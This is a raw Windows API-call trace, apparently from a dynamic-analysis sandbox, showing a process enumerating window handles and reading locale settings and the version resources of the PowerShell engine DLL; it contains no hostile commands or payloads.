	[0631.477] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xe04
	[0631.477] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xc94
	[0631.477] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x13b0
	[0631.477] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x13ac
	[0631.477] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x13a8
	[0631.477] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1374
	[0631.478] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x132c
	[0631.478] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1328
	[0631.478] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x12d0
	[0631.478] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x12cc
	[0631.478] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x12c8
	[0631.478] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1290
	[0631.478] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1218
	[0631.478] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1214
	[0631.478] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x11ec
	[0631.478] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x11e8
	[0631.479] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x11cc
	[0631.479] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1140
	[0631.479] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xe6c
	[0631.479] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x6e8
	[0631.479] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xc6c
	[0631.479] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xf94
	[0631.479] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xffc
	[0631.479] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xf74
	[0631.479] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xf08
	[0631.479] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xf0c
	[0631.479] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xed8
	[0631.480] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xe90
	[0631.480] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xea8
	[0631.480] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xfa8
	[0631.480] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xfbc
	[0631.480] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xfb8
	[0631.480] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xfb4
	[0631.480] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xfb0
	[0631.480] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xfac
	[0631.480] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xfc0
	[0631.480] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xfd0
	[0631.481] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xf88
	[0631.481] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xf84
	[0631.481] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xf80
	[0631.481] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xde0
	[0631.481] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xddc
	[0631.481] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xdd8
	[0631.481] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xd34
	[0631.481] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xd10
	[0631.481] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xd0c
	[0631.481] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xc9c
	[0631.482] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xc74
	[0631.482] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xc1c
	[0631.482] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xc08
	[0631.482] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xabc
	[0631.482] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x24c
	[0631.482] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xbb0
	[0631.482] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xbfc
	[0631.482] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xb10
	[0631.482] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x374
	[0631.482] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x368
	[0631.483] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xb28
	[0631.483] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xae8
	[0631.483] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xb14
	[0631.483] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x95c
	[0631.483] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xa8c
	[0631.483] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x46c
	[0631.483] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xb3c
	[0631.483] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xa90
	[0631.483] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xad0
	[0631.483] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xa9c
	[0631.483] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xaa0
	[0631.484] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xb1c
	[0631.484] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x7e0
	[0631.484] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xa74
	[0631.484] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x694
	[0631.484] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xa28
	[0631.484] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x9b0
	[0631.484] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x8d8
	[0631.484] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x940
	[0631.484] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x93c
	[0631.484] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4ec
	[0631.485] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x150
	[0631.485] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x720
	[0631.485] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x3c4
	[0631.485] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x7d4
	[0631.485] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x6c8
	[0631.485] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xb54
	[0631.485] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xb54
	[0631.485] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xb5c
	[0631.485] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x838
	[0631.485] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x818
	[0631.486] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x5b8
	[0631.486] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x494
	[0631.486] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1ec
	[0631.486] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x440
	[0631.486] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x7e8
	[0631.486] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x730
	[0631.486] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x2c8
	[0631.486] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x31c
	[0631.487] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x330
	[0631.487] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x128
	[0631.487] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x5c8
	[0631.487] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x6f8
	[0631.487] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x358
	[0631.487] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x73c
	[0631.487] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xb0
	[0631.487] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x250
	[0631.488] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x240
	[0631.488] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x790
	[0631.488] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x61c
	[0631.488] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x568
	[0631.488] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x538
	[0631.488] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x540
	[0631.488] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x460
	[0631.488] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x79c
	[0631.489] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4e0
	[0631.489] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x460
	[0631.489] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x778
	[0631.493] WerSetFlags () returned 0x0
	[0634.179] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0634.179] CoTaskMemFree (pv=0x0) 
	[0634.180] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x14da08, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x14da00 | out: pulNumLanguages=0x14da08, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x14da00) returned 1
	[0634.180] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x14da08, pwszLanguagesBuffer=0x2da71f0, pcchLanguagesBuffer=0x14da00 | out: pulNumLanguages=0x14da08, pwszLanguagesBuffer=0x2da71f0, pcchLanguagesBuffer=0x14da00) returned 1
	[0634.186] CoTaskMemAlloc (cb=0x24) returned 0x2b9290
	[0634.186] GetUserDefaultLocaleName (in: lpLocaleName=0x2b9290, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0634.187] CoTaskMemFree (pv=0x2b9290) 
	[0636.176] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0636.176] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0636.176] CoTaskMemFree (pv=0x2b14c0) 
	[0636.179] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0636.179] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0636.179] CoTaskMemFree (pv=0x2b14c0) 
	[0636.181] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0636.181] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0636.181] CoTaskMemFree (pv=0x2b14c0) 
	[0636.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0636.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0636.192] SetErrorMode (uMode=0x1) returned 0x1
	[0636.192] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x14d680 | out: lpFileInformation=0x14d680*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0636.192] SetErrorMode (uMode=0x1) returned 0x1
	[0636.192] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x14d8f0 | out: lpdwHandle=0x14d8f0) returned 0x94c
	[0636.197] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2daaa80 | out: lpData=0x2daaa80) returned 1
	[0636.198] VerQueryValueW (in: pBlock=0x2daaa80, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14d868, puLen=0x14d860 | out: lplpBuffer=0x14d868*=0x2daab1c, puLen=0x14d860) returned 1
	[0636.198] VerQueryValueW (in: pBlock=0x2daaa80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x14d7d8, puLen=0x14d7d0 | out: lplpBuffer=0x14d7d8*=0x2daabf8, puLen=0x14d7d0) returned 1
	[0636.198] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0636.198] CoTaskMemAlloc (cb=0x2e) returned 0x2b5260
	[0636.199] lstrcpyW (in: lpString1=0x2b5260, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0636.199] CoTaskMemFree (pv=0x2b5260) 
	[0636.199] VerQueryValueW (in: pBlock=0x2daaa80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x14d7d8, puLen=0x14d7d0 | out: lplpBuffer=0x14d7d8*=0x2daac4c, puLen=0x14d7d0) returned 1
	[0636.199] lstrlenW (lpString="System.Management.Automation") returned 28
	[0636.199] CoTaskMemAlloc (cb=0x3c) returned 0x2bc570
	[0636.199] lstrcpyW (in: lpString1=0x2bc570, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0636.199] CoTaskMemFree (pv=0x2bc570) 
	[0636.199] VerQueryValueW (in: pBlock=0x2daaa80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x14d7d8, puLen=0x14d7d0 | out: lplpBuffer=0x14d7d8*=0x2daaca8, puLen=0x14d7d0) returned 1
	[0636.199] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0636.199] CoTaskMemAlloc (cb=0x20) returned 0x2b92f0
	[0636.199] lstrcpyW (in: lpString1=0x2b92f0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0636.199] CoTaskMemFree (pv=0x2b92f0) 
	[0636.199] VerQueryValueW (in: pBlock=0x2daaa80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x14d7d8, puLen=0x14d7d0 | out: lplpBuffer=0x14d7d8*=0x2daace8, puLen=0x14d7d0) returned 1
	[0636.199] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0636.199] CoTaskMemAlloc (cb=0x44) returned 0x2bc570
	[0636.199] lstrcpyW (in: lpString1=0x2bc570, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0636.199] CoTaskMemFree (pv=0x2bc570) 
	[0636.199] VerQueryValueW (in: pBlock=0x2daaa80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x14d7d8, puLen=0x14d7d0 | out: lplpBuffer=0x14d7d8*=0x2daad50, puLen=0x14d7d0) returned 1
	[0636.200] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0636.200] CoTaskMemAlloc (cb=0x76) returned 0x2539b0
	[0636.200] lstrcpyW (in: lpString1=0x2539b0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0636.200] CoTaskMemFree (pv=0x2539b0) 
	[0636.200] VerQueryValueW (in: pBlock=0x2daaa80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x14d7d8, puLen=0x14d7d0 | out: lplpBuffer=0x14d7d8*=0x2daadec, puLen=0x14d7d0) returned 1
	[0636.200] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0636.200] CoTaskMemAlloc (cb=0x44) returned 0x2bc570
	[0636.200] lstrcpyW (in: lpString1=0x2bc570, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0636.200] CoTaskMemFree (pv=0x2bc570) 
	[0636.200] VerQueryValueW (in: pBlock=0x2daaa80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x14d7d8, puLen=0x14d7d0 | out: lplpBuffer=0x14d7d8*=0x2daae50, puLen=0x14d7d0) returned 1
	[0636.200] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0636.200] CoTaskMemAlloc (cb=0x58) returned 0x236c20
	[0636.200] lstrcpyW (in: lpString1=0x236c20, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0636.200] CoTaskMemFree (pv=0x236c20) 
	[0636.200] VerQueryValueW (in: pBlock=0x2daaa80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x14d7d8, puLen=0x14d7d0 | out: lplpBuffer=0x14d7d8*=0x2daaecc, puLen=0x14d7d0) returned 1
	[0636.201] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0636.201] CoTaskMemAlloc (cb=0x20) returned 0x2b92f0
	[0636.201] lstrcpyW (in: lpString1=0x2b92f0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0636.201] CoTaskMemFree (pv=0x2b92f0) 
	[0636.201] VerQueryValueW (in: pBlock=0x2daaa80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x14d7d8, puLen=0x14d7d0 | out: lplpBuffer=0x14d7d8*=0x2daab74, puLen=0x14d7d0) returned 1
	[0636.201] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0636.201] CoTaskMemAlloc (cb=0x66) returned 0x2abb10
	[0636.201] lstrcpyW (in: lpString1=0x2abb10, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0636.201] CoTaskMemFree (pv=0x2abb10) 
	[0636.201] VerQueryValueW (in: pBlock=0x2daaa80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x14d7d8, puLen=0x14d7d0 | out: lplpBuffer=0x14d7d8*=0x0, puLen=0x14d7d0) returned 0
	[0636.201] VerQueryValueW (in: pBlock=0x2daaa80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x14d7d8, puLen=0x14d7d0 | out: lplpBuffer=0x14d7d8*=0x0, puLen=0x14d7d0) returned 0
	[0636.201] VerQueryValueW (in: pBlock=0x2daaa80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x14d7d8, puLen=0x14d7d0 | out: lplpBuffer=0x14d7d8*=0x0, puLen=0x14d7d0) returned 0
	[0636.201] VerQueryValueW (in: pBlock=0x2daaa80, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14d7a8, puLen=0x14d7a0 | out: lplpBuffer=0x14d7a8*=0x2daab1c, puLen=0x14d7a0) returned 1
	[0636.201] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0636.201] VerLanguageNameW (in: wLang=0x0, szLang=0x2564a0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0636.201] CoTaskMemFree (pv=0x2564a0) 
